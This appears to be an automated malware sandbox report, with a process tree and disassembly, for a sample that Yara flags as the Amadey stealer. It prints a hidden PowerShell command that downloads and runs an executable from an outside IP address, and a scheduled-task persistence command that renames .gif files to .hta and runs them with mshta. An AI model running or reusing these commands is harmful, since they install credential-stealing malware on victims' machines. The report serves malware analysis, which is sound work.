                                                                                                                                                                                                                        File size:289'792 bytes
                                                                                                                                                                                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                        General

                                                                                                                                                                                                                        Target ID:48
                                                                                                                                                                                                                        Start time:03:49:32
                                                                                                                                                                                                                        Start date:31/12/2024
                                                                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                        Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                        General

                                                                                                                                                                                                                        Target ID:49
                                                                                                                                                                                                                        Start time:03:49:32
                                                                                                                                                                                                                        Start date:31/12/2024
                                                                                                                                                                                                                        Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                        Commandline:C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
                                                                                                                                                                                                                        Imagebase:0x7ff7542e0000
                                                                                                                                                                                                                        File size:289'792 bytes
                                                                                                                                                                                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                        General

                                                                                                                                                                                                                        Target ID:50
                                                                                                                                                                                                                        Start time:03:49:32
                                                                                                                                                                                                                        Start date:31/12/2024
                                                                                                                                                                                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                        Commandline:powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
                                                                                                                                                                                                                        Imagebase:0x7ff788560000
                                                                                                                                                                                                                        File size:452'608 bytes
                                                                                                                                                                                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                        General

                                                                                                                                                                                                                        Target ID:51
                                                                                                                                                                                                                        Start time:03:49:33
                                                                                                                                                                                                                        Start date:31/12/2024
                                                                                                                                                                                                                        Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                        Commandline:C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
                                                                                                                                                                                                                        Imagebase:0x7ff7542e0000
                                                                                                                                                                                                                        File size:289'792 bytes
                                                                                                                                                                                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                        General

                                                                                                                                                                                                                        Target ID:52
                                                                                                                                                                                                                        Start time:03:49:33
                                                                                                                                                                                                                        Start date:31/12/2024
                                                                                                                                                                                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                        Commandline:powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
                                                                                                                                                                                                                        Imagebase:0x7ff788560000
                                                                                                                                                                                                                        File size:452'608 bytes
                                                                                                                                                                                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                        General

                                                                                                                                                                                                                        Target ID:53
                                                                                                                                                                                                                        Start time:03:49:35
                                                                                                                                                                                                                        Start date:31/12/2024
                                                                                                                                                                                                                        Path:C:\Windows\System32\mshta.exe
                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                        Commandline:mshta "C:\Temp\.hta"
                                                                                                                                                                                                                        Imagebase:0x7ff764df0000
                                                                                                                                                                                                                        File size:14'848 bytes
                                                                                                                                                                                                                        MD5 hash:0B4340ED812DC82CE636C00FA5C9BEF2
                                                                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                        General

                                                                                                                                                                                                                        Target ID:54
                                                                                                                                                                                                                        Start time:03:49:35
                                                                                                                                                                                                                        Start date:31/12/2024
                                                                                                                                                                                                                        Path:C:\Windows\System32\schtasks.exe
                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                        Commandline:schtasks /delete /tn "AutoRunHTA" /f
                                                                                                                                                                                                                        Imagebase:0x7ff76f990000
                                                                                                                                                                                                                        File size:235'008 bytes
                                                                                                                                                                                                                        MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                        General

                                                                                                                                                                                                                        Target ID:55
                                                                                                                                                                                                                        Start time:03:49:35
                                                                                                                                                                                                                        Start date:31/12/2024
                                                                                                                                                                                                                        Path:C:\Windows\System32\schtasks.exe
                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                        Commandline:schtasks /create /tn "AutoRunHTA" /tr "cmd.exe /c for %f in (\"C:\Temp\*.gif\") do (copy \"%f\" \"C:\Temp\\random.hta\" & start mshta \"C:\Temp\\random.hta\")" /sc minute /mo 25 /ru "user" /rl HIGHEST /f
                                                                                                                                                                                                                        Imagebase:0x7ff76f990000
                                                                                                                                                                                                                        File size:235'008 bytes
                                                                                                                                                                                                                        MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                        General

                                                                                                                                                                                                                        Target ID:56
                                                                                                                                                                                                                        Start time:03:49:35
                                                                                                                                                                                                                        Start date:31/12/2024
                                                                                                                                                                                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
                                                                                                                                                                                                                        Imagebase:0x7ff788560000
                                                                                                                                                                                                                        File size:452'608 bytes
                                                                                                                                                                                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                        General

                                                                                                                                                                                                                        Target ID:57
                                                                                                                                                                                                                        Start time:03:49:35
                                                                                                                                                                                                                        Start date:31/12/2024
                                                                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                        Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                        Has exited:false

                                                                                                                                                                                                                        General

                                                                                                                                                                                                                        Target ID:58
                                                                                                                                                                                                                        Start time:03:49:37
                                                                                                                                                                                                                        Start date:31/12/2024
                                                                                                                                                                                                                        Path:C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe
                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                        Commandline:"C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"
                                                                                                                                                                                                                        Imagebase:0x5f0000
                                                                                                                                                                                                                        File size:3'243'520 bytes
                                                                                                                                                                                                                        MD5 hash:375CE25C0529862F6EE716A3E001BB0E
                                                                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                        Yara matches:
                                                                                                                                                                                                                        • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 0000003A.00000002.2789901199.00000000005F1000.00000040.00000001.01000000.0000001A.sdmp, Author: Joe Security
                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                        General

                                                                                                                                                                                                                        Target ID:59
                                                                                                                                                                                                                        Start time:03:49:38
                                                                                                                                                                                                                        Start date:31/12/2024
                                                                                                                                                                                                                        Path:C:\YQNZByFp\jyidkjkfhjawd.exe
                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                        Commandline:"C:\YQNZByFp\jyidkjkfhjawd.exe"
                                                                                                                                                                                                                        Imagebase:0xc00000
                                                                                                                                                                                                                        File size:1'282'048 bytes
                                                                                                                                                                                                                        MD5 hash:1B40450E11F71DA7D6F3D9C025C078E0
                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                        Programmed in:Borland Delphi
                                                                                                                                                                                                                        Antivirus matches:
                                                                                                                                                                                                                        • Detection: 63%, ReversingLabs
                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                        General

                                                                                                                                                                                                                        Target ID:60
                                                                                                                                                                                                                        Start time:03:49:40
                                                                                                                                                                                                                        Start date:31/12/2024
                                                                                                                                                                                                                        Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                        Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\1026818021\am.cmd" "
                                                                                                                                                                                                                        Imagebase:0x7ff7542e0000
                                                                                                                                                                                                                        File size:289'792 bytes
                                                                                                                                                                                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                        General

                                                                                                                                                                                                                        Target ID:61
                                                                                                                                                                                                                        Start time:03:49:40
                                                                                                                                                                                                                        Start date:31/12/2024
                                                                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                        Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                        General

                                                                                                                                                                                                                        Target ID:62
                                                                                                                                                                                                                        Start time:03:49:40
                                                                                                                                                                                                                        Start date:31/12/2024
                                                                                                                                                                                                                        Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                        Commandline:"C:\Windows\system32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\1026818021\am.cmd" any_word
                                                                                                                                                                                                                        Imagebase:0x7ff7542e0000
                                                                                                                                                                                                                        File size:289'792 bytes
                                                                                                                                                                                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                        General

                                                                                                                                                                                                                        Target ID:63
                                                                                                                                                                                                                        Start time:03:49:40
                                                                                                                                                                                                                        Start date:31/12/2024
                                                                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                        Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                        General

                                                                                                                                                                                                                        Target ID:64
                                                                                                                                                                                                                        Start time:03:49:41
                                                                                                                                                                                                                        Start date:31/12/2024
                                                                                                                                                                                                                        Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                        Commandline:C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
                                                                                                                                                                                                                        Imagebase:0x7ff7542e0000
                                                                                                                                                                                                                        File size:289'792 bytes
                                                                                                                                                                                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                        General

                                                                                                                                                                                                                        Target ID:65
                                                                                                                                                                                                                        Start time:03:49:41
                                                                                                                                                                                                                        Start date:31/12/2024
                                                                                                                                                                                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                        Commandline:powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
                                                                                                                                                                                                                        Imagebase:0x7ff788560000
                                                                                                                                                                                                                        File size:452'608 bytes
                                                                                                                                                                                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                        General

                                                                                                                                                                                                                        Target ID:66
                                                                                                                                                                                                                        Start time:03:49:43
                                                                                                                                                                                                                        Start date:31/12/2024
                                                                                                                                                                                                                        Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                        Commandline:C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
                                                                                                                                                                                                                        Imagebase:0x7ff7542e0000
                                                                                                                                                                                                                        File size:289'792 bytes
                                                                                                                                                                                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                        General

                                                                                                                                                                                                                        Target ID:67
                                                                                                                                                                                                                        Start time:03:49:43
                                                                                                                                                                                                                        Start date:31/12/2024
                                                                                                                                                                                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                        Commandline:powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
                                                                                                                                                                                                                        Imagebase:0x7ff788560000
                                                                                                                                                                                                                        File size:452'608 bytes
                                                                                                                                                                                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                        General

                                                                                                                                                                                                                        Target ID:68
                                                                                                                                                                                                                        Start time:03:49:44
                                                                                                                                                                                                                        Start date:31/12/2024
                                                                                                                                                                                                                        Path:C:\Windows\System32\mshta.exe
                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                        Commandline:mshta "C:\Temp\.hta"
                                                                                                                                                                                                                        Imagebase:0x7ff764df0000
                                                                                                                                                                                                                        File size:14'848 bytes
                                                                                                                                                                                                                        MD5 hash:0B4340ED812DC82CE636C00FA5C9BEF2
                                                                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                        General

                                                                                                                                                                                                                        Target ID:69
                                                                                                                                                                                                                        Start time:03:49:44
                                                                                                                                                                                                                        Start date:31/12/2024
                                                                                                                                                                                                                        Path:C:\Windows\System32\schtasks.exe
                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                        Commandline:schtasks /delete /tn "AutoRunHTA" /f
                                                                                                                                                                                                                        Imagebase:0x7ff76f990000
                                                                                                                                                                                                                        File size:235'008 bytes
                                                                                                                                                                                                                        MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                        General

                                                                                                                                                                                                                        Target ID:70
                                                                                                                                                                                                                        Start time:03:49:44
                                                                                                                                                                                                                        Start date:31/12/2024
                                                                                                                                                                                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
                                                                                                                                                                                                                        Imagebase:0x7ff788560000
                                                                                                                                                                                                                        File size:452'608 bytes
                                                                                                                                                                                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                        General

                                                                                                                                                                                                                        Target ID:71
                                                                                                                                                                                                                        Start time:03:49:44
                                                                                                                                                                                                                        Start date:31/12/2024
                                                                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                        Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                        Has exited:false

                                                                                                                                                                                                                        General

                                                                                                                                                                                                                        Target ID:72
                                                                                                                                                                                                                        Start time:03:49:45
                                                                                                                                                                                                                        Start date:31/12/2024
                                                                                                                                                                                                                        Path:C:\Windows\System32\schtasks.exe
                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                        Commandline:schtasks /create /tn "AutoRunHTA" /tr "cmd.exe /c for %f in (\"C:\Temp\*.gif\") do (copy \"%f\" \"C:\Temp\\random.hta\" & start mshta \"C:\Temp\\random.hta\")" /sc minute /mo 25 /ru "user" /rl HIGHEST /f
                                                                                                                                                                                                                        Imagebase:0x7ff76f990000
                                                                                                                                                                                                                        File size:235'008 bytes
                                                                                                                                                                                                                        MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                        General

                                                                                                                                                                                                                        Target ID:73
                                                                                                                                                                                                                        Start time:03:49:47
                                                                                                                                                                                                                        Start date:31/12/2024
                                                                                                                                                                                                                        Path:C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe
                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                        Commandline:"C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"
                                                                                                                                                                                                                        Imagebase:0x5f0000
                                                                                                                                                                                                                        File size:3'243'520 bytes
                                                                                                                                                                                                                        MD5 hash:375CE25C0529862F6EE716A3E001BB0E
                                                                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                        Yara matches:
                                                                                                                                                                                                                        • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000049.00000002.2882969985.00000000005F1000.00000040.00000001.01000000.0000001A.sdmp, Author: Joe Security
                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                        Disassembly

                                                                                                                                                                                                                        Reset < >

                                                                                                                                                                                                                          Non-executed Functions

                                                                                                                                                                                                                          Function 6C486E90 Relevance: 142.5, APIs: 71, Strings: 10, Instructions: 783stringmemoryCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • PR_CallOnce.NSS3(6C5D2120,6C487E60), ref: 6C486EBC
                                                                                                                                                                                                                          • TlsGetValue.KERNEL32 ref: 6C486EDF
                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?), ref: 6C486EF3
                                                                                                                                                                                                                          • PR_WaitCondVar.NSS3(000000FF), ref: 6C486F25
                                                                                                                                                                                                                            • Part of subcall function 6C45A900: TlsGetValue.KERNEL32(00000000,?,6C5D14E4,?,6C3F4DD9), ref: 6C45A90F
                                                                                                                                                                                                                            • Part of subcall function 6C45A900: _PR_MD_WAIT_CV.NSS3(?,?,?), ref: 6C45A94F
                                                                                                                                                                                                                          • PR_Unlock.NSS3 ref: 6C486F68
                                                                                                                                                                                                                          • PORT_ZAlloc_Util.NSS3(00000008), ref: 6C486FA9
                                                                                                                                                                                                                          • TlsGetValue.KERNEL32 ref: 6C4870B4
                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?), ref: 6C4870C8
                                                                                                                                                                                                                          • PR_CallOnce.NSS3(6C5D24C0,6C4C7590), ref: 6C487104
                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE013,00000000), ref: 6C487117
                                                                                                                                                                                                                          • SECOID_Init.NSS3 ref: 6C487128
                                                                                                                                                                                                                          • PORT_Alloc_Util.NSS3(00000057), ref: 6C48714E
                                                                                                                                                                                                                          • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C48717F
                                                                                                                                                                                                                          • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C4871A9
                                                                                                                                                                                                                          • PR_NotifyAllCondVar.NSS3 ref: 6C4871CF
                                                                                                                                                                                                                          • PR_Unlock.NSS3 ref: 6C4871DD
                                                                                                                                                                                                                          • free.MOZGLUE(?), ref: 6C4871EE
                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE013,00000000), ref: 6C487208
                                                                                                                                                                                                                          • free.MOZGLUE(00000000), ref: 6C487221
                                                                                                                                                                                                                          • free.MOZGLUE(00000001), ref: 6C487235
                                                                                                                                                                                                                          • TlsGetValue.KERNEL32 ref: 6C48724A
                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?), ref: 6C48725E
                                                                                                                                                                                                                          • PR_NotifyCondVar.NSS3 ref: 6C487273
                                                                                                                                                                                                                          • PR_Unlock.NSS3 ref: 6C487281
                                                                                                                                                                                                                          • SECMOD_DestroyModule.NSS3(00000000), ref: 6C487291
                                                                                                                                                                                                                          • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C4872B1
                                                                                                                                                                                                                          • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C4872D4
                                                                                                                                                                                                                          • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C4872E3
                                                                                                                                                                                                                          • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C487301
                                                                                                                                                                                                                          • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C487310
                                                                                                                                                                                                                          • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C487335
                                                                                                                                                                                                                          • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C487344
                                                                                                                                                                                                                          • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C487363
                                                                                                                                                                                                                          • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C487372
                                                                                                                                                                                                                          • PR_smprintf.NSS3(name="%s" parameters="configdir='%s' certPrefix='%s' keyPrefix='%s' secmod='%s' flags=%s updatedir='%s' updateCertPrefix='%s' updateKeyPrefix='%s' updateid='%s' updateTokenDescription='%s' %s" NSS="flags=internal,moduleDB,moduleDBOnly,critical%s",NSS Internal Module,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,00000000,6C5C0148,,defaultModDB,internalKeySlot), ref: 6C4874CC
                                                                                                                                                                                                                          • free.MOZGLUE(00000000), ref: 6C487513
                                                                                                                                                                                                                          • free.MOZGLUE(00000000), ref: 6C48751B
                                                                                                                                                                                                                          • free.MOZGLUE(00000000), ref: 6C487528
                                                                                                                                                                                                                          • free.MOZGLUE(00000000), ref: 6C48753C
                                                                                                                                                                                                                          • free.MOZGLUE(00000000), ref: 6C487550
                                                                                                                                                                                                                          • free.MOZGLUE(00000000), ref: 6C487561
                                                                                                                                                                                                                          • free.MOZGLUE(00000000), ref: 6C487572
                                                                                                                                                                                                                          • free.MOZGLUE(00000000), ref: 6C487583
                                                                                                                                                                                                                          • free.MOZGLUE(00000000), ref: 6C487594
                                                                                                                                                                                                                          • free.MOZGLUE(00000000), ref: 6C4875A2
                                                                                                                                                                                                                          • SECMOD_LoadModule.NSS3(00000000,00000000,00000001), ref: 6C4875BD
                                                                                                                                                                                                                          • free.MOZGLUE(00000000), ref: 6C4875C8
                                                                                                                                                                                                                          • free.MOZGLUE(00000000), ref: 6C4875F1
                                                                                                                                                                                                                          • PR_NewLock.NSS3 ref: 6C487636
                                                                                                                                                                                                                          • SECMOD_DestroyModule.NSS3(00000000), ref: 6C487686
                                                                                                                                                                                                                          • PR_NewLock.NSS3 ref: 6C4876A2
                                                                                                                                                                                                                            • Part of subcall function 6C5398D0: calloc.MOZGLUE(00000001,00000084,6C460936,00000001,?,6C46102C), ref: 6C5398E5
                                                                                                                                                                                                                          • PORT_ZAlloc_Util.NSS3(00000050), ref: 6C4876B6
                                                                                                                                                                                                                          • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,sql:,00000004), ref: 6C487707
                                                                                                                                                                                                                          • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,dbm:,00000004), ref: 6C48771C
                                                                                                                                                                                                                          • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,extern:,00000007), ref: 6C487731
                                                                                                                                                                                                                          • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,rdb:,00000004), ref: 6C48774A
                                                                                                                                                                                                                          • DeleteCriticalSection.KERNEL32(?), ref: 6C487770
                                                                                                                                                                                                                          • free.MOZGLUE(?), ref: 6C487779
                                                                                                                                                                                                                          • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C48779A
